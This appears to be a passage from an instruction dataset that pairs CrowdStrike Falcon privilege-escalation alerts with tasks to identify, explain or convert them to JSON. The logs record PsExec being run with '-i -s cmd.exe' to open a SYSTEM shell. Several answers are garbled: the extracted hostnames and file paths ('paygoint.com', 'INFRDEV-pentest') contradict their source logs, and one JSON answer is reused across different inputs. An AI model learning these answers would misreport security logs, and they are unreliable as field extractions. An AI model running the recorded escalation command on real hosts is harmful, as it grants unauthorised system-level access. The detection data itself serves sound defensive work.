"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T18:24:34Z\",\"template_instance_id\":\"1384\",\"behavior_id\":\"10447\",\"filename\":\"PsExec.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Users\\\\charlie\\\\Downloads\\\\PSTools\\\\PsExec.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Users\\\\charlie\\\\Downloads\\\\PSTools\\\\PsExec.exe\\\" -i -s cmd.exe\",\"scenario\":\"suspicious_activity\",\"objective\":\"Gain Access\",\"tactic\":\"Privilege Escalation\",\"tactic_id\":\"TA0004\",\"technique\":\"Abuse Elevation Control Mechanism\",\"technique_id\":\"T1548\",\"display_name\":\"SuspiciousPrivEsc\",\"description\":\"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.\",\"severity\":30,\"confidence\":80,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"charlie\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738\",\"sha256\":\"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b\",\"md5\":\"24a648a48741b1ac809e47b9543c6f12\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426\"},\"pattern_disposition\":0,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T18:24:34Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "185.193.34.232",
"userName": "charlie"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\charlie\Downloads\PSTools\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\charlie\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=185.193.34.232 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\charlie\Downloads\PSTools\PsExec.exe ::: userName=charlie ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
filename: PsExec.exe
filepath: \Device\HarddiskVolume1\Users\INFRDEV-pentest\Downloads\PSTools\PsExec.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T18:24:34Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 185.193.34.232
userName: charlie | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\bob\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\bob\Downloads\PSTools\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b",
"filename": "PsExec.exe",
"filepath": "\\Device\\HarddiskVolume1\\Users\\INFRDEV-pentest\\Downloads\\PSTools\\PsExec.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T18:24:34Z\",\"template_instance_id\":\"1384\",\"behavior_id\":\"10447\",\"filename\":\"PsExec.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Users\\\\bob\\\\Downloads\\\\PSTools\\\\PsExec.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Users\\\\bob\\\\Downloads\\\\PSTools\\\\PsExec.exe\\\" -i -s cmd.exe\",\"scenario\":\"suspicious_activity\",\"objective\":\"Gain Access\",\"tactic\":\"Privilege Escalation\",\"tactic_id\":\"TA0004\",\"technique\":\"Abuse Elevation Control Mechanism\",\"technique_id\":\"T1548\",\"display_name\":\"SuspiciousPrivEsc\",\"description\":\"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.\",\"severity\":30,\"confidence\":80,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738\",\"sha256\":\"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b\",\"md5\":\"24a648a48741b1ac809e47b9543c6f12\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426\"},\"pattern_disposition\":0,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T18:24:34Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "191.139.78.14",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\bob\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\bob\Downloads\PSTools\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\bob\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\bob\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=191.139.78.14 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\bob\Downloads\PSTools\PsExec.exe ::: userName=bob ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.oscorpint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
filename: PsExec.exe
filepath: \Device\HarddiskVolume1\Users\INFRDEV-pentest\Downloads\PSTools\PsExec.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T18:24:34Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 191.139.78.14
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T18:24:34Z","template_instance_id":"1384","behavior_id":"10447","filename":"PsExec.exe","filepath":"\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe","alleged_filetype":"exe","cmdline":"\"C:\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe\" -i -s cmd.exe","scenario":"suspicious_activity","objective":"Gain Access","tactic":"Privilege Escalation","tactic_id":"TA0004","technique":"Abuse Elevation Control Mechanism","technique_id":"T1548","display_name":"SuspiciousPrivEsc","description":"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.","severity":30,"confidence":80,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738","sha256":"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b","md5":"24a648a48741b1ac809e47b9543c6f12","parent_details":{"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c","parent_md5":"7353f60b1739074eb17c5f4dddefe239","parent_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426"},"pattern_disposition":0,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\Device\HarddiskVolume1\Users\johndoe\Downloads\PSTools\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVIINFRDEVAPP02.devnvi.paygoint.com",
"clientmac": "0edeb6ae9241",
"filehash": "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b",
"filename": "PsExec.exe",
"filepath": "\\Device\\HarddiskVolume1\\Users\\INFRDEV-pentest\\Downloads\\PSTools\\PsExec.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T18:24:34Z\",\"template_instance_id\":\"1384\",\"behavior_id\":\"10447\",\"filename\":\"PsExec.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Users\\\\johndoe\\\\Downloads\\\\PSTools\\\\PsExec.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Users\\\\johndoe\\\\Downloads\\\\PSTools\\\\PsExec.exe\\\" -i -s cmd.exe\",\"scenario\":\"suspicious_activity\",\"objective\":\"Gain Access\",\"tactic\":\"Privilege Escalation\",\"tactic_id\":\"TA0004\",\"technique\":\"Abuse Elevation Control Mechanism\",\"technique_id\":\"T1548\",\"display_name\":\"SuspiciousPrivEsc\",\"description\":\"A process has escalated privileges, this could be as a result of an adversary's attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.\",\"severity\":30,\"confidence\":80,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674313837342\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675598189738\",\"sha256\":\"078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b\",\"md5\":\"24a648a48741b1ac809e47b9543c6f12\",\"parent_details\":{\"parent_sha256\":\"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c\",\"parent_md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"parent_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:675576884426\"},\"pattern_disposition\":0,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=42.170.66.194 ::: fileHash=078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b ::: fileName=PsExec.exe ::: filePath=\\Device\\HarddiskVolume1\\Users\\johndoe\\Downloads\\PSTools\\PsExec.exe ::: userName=johndoe ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T18:24:34Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T18:24:34Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T18:24:34Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "42.170.66.194",
"userName": "johndoe"
} | Create a JSON artifact from the message |
